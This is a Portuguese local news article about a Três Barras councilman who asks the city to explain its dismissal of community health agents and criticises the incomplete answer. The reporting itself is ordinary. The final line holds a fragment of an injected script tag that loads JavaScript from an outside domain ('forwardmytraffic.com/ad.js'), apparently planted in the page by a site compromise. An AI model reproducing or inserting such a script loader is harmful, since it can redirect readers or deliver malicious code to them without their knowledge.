Vereador pediu explicação sobre a dispensa das Agentes Comunitárias de Saúde
A demissão de diversas agentes de saúde que atuavam no programa Estratégia de Saúde da Família, ESF, em Três Barras, motivaram o vereador Marco Antônio de Souza, Gorguinho (MDB), a editar um requerimento cobrando explicações da prefeitura municipal. O documento foi respondido pelo executivo, de acordo com expediente da Câmara de Vereadores na última segunda-feira, 11.
Para o vereador a resposta não está de acordo com o solicitado: “para mim a resposta veio incompleta, eu pedi o parecer jurídico que embasava a decisão e este não veio”, comentou durante utilização da Palavra Livre.
Gorguinho pediu as explicações porque, para ele, o governo decidiu desligar diversos Agentes Comunitários de Saúde e não deu explicações do que fará em substituição ao programa: “o executivo ainda não demonstrou uma posição clara do que será feito”, e que acha “prematura a extinção ou redução do programa sem saber a conseqüência”, afirmou à reportagem.
O vereador disse que “não se pode cancelar um programa que atende a população, e deixar a comunidade desassistida”, ressaltou. “Estamos aqui para defender os interesses das Agentes de Saúde, da Comunidade que precisa do programa e da população em geral que não pode ficar sem o atendimento, principalmente nessa área fundamental que é a saúde”, finalizou…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>